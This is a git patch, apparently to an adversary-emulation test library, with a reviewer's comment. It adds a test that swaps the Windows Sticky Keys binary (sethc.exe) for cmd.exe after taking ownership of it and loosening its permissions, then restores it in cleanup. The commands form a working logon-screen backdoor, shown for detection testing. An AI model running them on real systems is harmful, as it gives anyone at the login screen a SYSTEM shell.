From 91ea164b8e4d34bf0e0f7b1967993c7fdd5bc28a Mon Sep 17 00:00:00 2001
From: P4T12ICK
Date: Fri, 27 Nov 2020 22:13:05 +0100
Subject: [PATCH] new atomic (#1298)

Co-authored-by: P4T12ICK
Co-authored-by: Carrie Roberts
---
 atomics/T1546.008/T1546.008.yaml | 19 +++++++++++++++++--
 1 file changed, 17 insertions(+), 2 deletions(-)

diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index 4ddefabb..fda9c6b0 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -25,7 +25,7 @@ atomic_tests:
       $input_table = "#{parent_list}".split(",")
       $Name = "Debugger"
       $Value = "#{attached_process}"
-      Foreach ($item in $input_table){
+      Foreach ($item in $input_table){
         $item = $item.trim()
         $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
         IF(!(Test-Path $registryPath))
@@ -47,4 +47,19 @@ atomic_tests:
       }
     name: powershell
     elevation_required: true
-
+- name: Replace binary of sticky keys
+  auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
+  description: |
+    Replace sticky keys binary (sethc.exe) with cmd.exe
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+      takeown /F C:\Windows\System32\sethc.exe /A
+      icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
+      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
+    cleanup_command: |
+      copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
+    name: command_prompt
+    elevation_required: true
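Review bot: The first `copy` in the new `command:` block overwrites `sethc_backup.exe` unconditionally, so if an earlier run's cleanup was skipped or failed, a re-run backs up the already-swapped `cmd.exe` and the genuine `sethc.exe` is lost until it is restored from the component store or an `sfc /scannow`; guard it with `if not exist C:\Windows\System32\sethc_backup.exe copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe`. The `cleanup_command` only restores the file contents: after `takeown /A` the owner stays Administrators, the `Administrators:F` grant from `icacls` remains on a System32 binary, and the backup file is left behind, so the host ends the test with a weaker posture than it started with; append `icacls C:\Windows\System32\sethc.exe /setowner "NT SERVICE\TrustedInstaller"` and `del C:\Windows\System32\sethc_backup.exe`, and consider tightening the Administrators ACE back to read/execute with `icacls ... /grant:r Administrators:RX`. The `/t` on the `icacls` call recurses into subdirectories, which is meaningless for a single file and can be dropped. The one-line description would also help operators if it stated the observable effect, e.g. `While the swap is in place, triggering the Sticky Keys shortcut at the logon screen launches cmd.exe instead of the accessibility dialog`.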